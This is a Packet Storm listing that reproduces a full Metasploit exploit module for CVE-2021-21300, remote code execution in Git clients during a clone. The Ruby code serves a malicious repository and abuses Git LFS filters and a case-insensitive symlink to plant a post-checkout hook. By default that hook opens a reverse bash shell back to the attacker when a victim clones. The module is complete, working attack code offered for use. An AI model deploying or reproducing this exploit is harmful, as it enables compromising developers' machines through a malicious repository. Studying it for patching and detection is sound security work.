exploit the possibilities

Git LFS Clone Command Execution

Git LFS Clone Command Execution
Posted Aug 31, 2021
Authored by Shelby Pace, Matheus Tavares, Johannes Schindelin | Site metasploit.com

Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems are vulnerable to remote code execution while cloning a repository. Usage of clean / smudge filters through Git LFS and a case-insensitive file system changes the checkout order of repository files which enables the placement of a Git hook in the .git/hooks directory. By default, this Metasploit module writes a post-checkout script so that the payload will automatically be executed upon checkout of the repository.

tags | exploit, remote, code execution
advisories | CVE-2021-21300
MD5 | b389779a9c5da6a81739bfdce3bfb340

Git LFS Clone Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Git
include Msf::Exploit::Git::SmartHttp
include Msf::Exploit::Git::Lfs
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Git LFS Clone Command Exec',
'Description' => %q{
Git clients that support delay-capable clean / smudge
filters and symbolic links on case-insensitive file systems are
vulnerable to remote code execution while cloning a repository.

Usage of clean / smudge filters through Git LFS and a
case-insensitive file system changes the checkout order
of repository files which enables the placement of a Git hook
in the `.git/hooks` directory. By default, this module writes
a `post-checkout` script so that the payload will automatically
be executed upon checkout of the repository.
},
'License' => MSF_LICENSE,
'Author' => [
'Johannes Schindelin', # Discovery
'Matheus Tavares', # Discovery
'Shelby Pace' # Metasploit module
],
'References' => [
[ 'CVE', '2021-21300' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2021/Apr/60' ],
[ 'URL', 'https://twitter.com/Foone/status/1369500506469527552?s=20' ]
],
'DisclosureDate' => '2021-04-26',
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [
[
'Git for MacOS, Windows',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
}
)
)

register_options(
[
OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])
]
)

deregister_options('RHOSTS', 'RPORT')
end

def exploit
setup_repo_structure
super
end

def setup_repo_structure
link_content = '.git/hooks'
link_name = Rex::Text.rand_text_alpha(8..12).downcase
link_obj = GitObject.build_blob_object(link_content)

dir_name = link_name.upcase
git_attr = '.gitattributes'

git_hook = 'post-checkout'
@hook_payload = "#!/bin/sh\n#{payload.encoded}"
ptr_file = generate_pointer_file(@hook_payload)

# need to initially send the pointer file
# then send the actual object when Git LFS requests it
git_hook_ptr = GitObject.build_blob_object(ptr_file)

git_attr_content = "#{dir_name}/#{git_hook} filter=lfs diff=lfs merge=lfs"
git_attr_obj = GitObject.build_blob_object(git_attr_content)

sub_file_content = Rex::Text.rand_text_alpha(0..150)
sub_file_name = Rex::Text.rand_text_alpha(8..12)
sub_file_obj = GitObject.build_blob_object(sub_file_content)

register_dir_for_cleanup('.git')
register_files_for_cleanup(git_attr, link_name)

# create subdirectory which holds payload
sub_tree =
[
{
mode: '100644',
file_name: sub_file_name,
sha1: sub_file_obj.sha1
},
{
mode: '100755',
file_name: git_hook,
sha1: git_hook_ptr.sha1
}
]

sub_tree_obj = GitObject.build_tree_object(sub_tree)

# root of repository
tree_ent =
[
{
mode: '100644',
file_name: git_attr,
sha1: git_attr_obj.sha1
},
{
mode: '040000',
file_name: dir_name,
sha1: sub_tree_obj.sha1
},
{
mode: '120000',
file_name: link_name,
sha1: link_obj.sha1
}
]
tree_obj = GitObject.build_tree_object(tree_ent)
commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)

@git_objs =
[
commit, tree_obj, sub_tree_obj,
sub_file_obj, git_attr_obj, git_hook_ptr,
link_obj
]

@refs =
{
'HEAD' => 'refs/heads/master',
'refs/heads/master' => commit.sha1
}
end

def create_git_uri
"/#{Faker::App.name.downcase}.git".gsub(' ', '-')
end

def primer
@git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
@git_addr = URI.parse(get_uri).merge(@git_repo_uri)
print_status("Git repository to clone: #{@git_addr}")
hardcoded_uripath(@git_repo_uri)
hardcoded_uripath("/#{Digest::SHA256.hexdigest(@hook_payload)}")
end

def on_request_uri(cli, req)
if req.uri.include?('git-upload-pack')
request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)
case request.type
when 'ref-discovery'
response = send_refs(request)
when 'upload-pack'
response = send_requested_objs(request)
else
fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')
end
else
response = handle_lfs_objects(req)
unless response.code == 200
cli.send_response(response)
fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\'s LFS request')
end
end

cli.send_response(response)
end

def send_refs(req)
fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'

response = get_ref_discovery_response(req, @refs)
fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response

response
end

def send_requested_objs(req)
upload_pack_resp = get_upload_pack_response(req, @git_objs)
unless upload_pack_resp
fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')
end

upload_pack_resp
end

def handle_lfs_objects(req)
git_hook_obj = GitObject.build_blob_object(@hook_payload)

case req.method
when 'POST'
print_status('Sending payload data...')
response = get_batch_response(req, @git_addr, git_hook_obj)
fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response
when 'GET'
print_status('Sending LFS object...')
response = get_requested_obj_response(req, git_hook_obj)
fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response
else
fail_with(Failure::UnexpectedReply, 'Unable to handle client\'s request')
end

response
end
end
Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close